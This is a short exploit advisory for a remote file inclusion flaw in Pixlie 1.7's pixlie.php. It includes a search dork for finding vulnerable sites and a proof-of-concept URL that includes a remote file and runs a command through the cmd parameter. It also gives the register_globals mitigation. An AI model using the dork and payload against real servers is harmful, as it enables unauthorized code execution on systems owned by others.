Pixlie version 1.7 suffers from a remote file inclusion vulnerability in pixlie.php.
26ea74cb61d1341d7b4eb4b01ac2598bb9f382ba7243c70fde73c3ed446f41b2
Pixlie 1.7 Remote Command Execution Vulnerability
-----------------------------------------------------------------------
Script : Pixlie 1.7
Version : 1.7
Site : https://www.pixlie.de/download.php
Founder : Rizgar
Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)
d0rk : "Pixlie - die kostenlose Bildergalerie"
-----------------------------------------------------------------------
Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of the Pixlie 1.7. Complete in the system application not work.
Solution :
* register_globals = off
* You will wait for one new sale.
------------------------------------------------------------------------
look at pixlie.php
//$root = "/home/www/IhrBenutzer/html";
PoC :
https://www.example.com/pixlie.php?root=evil.txt?&cmd=id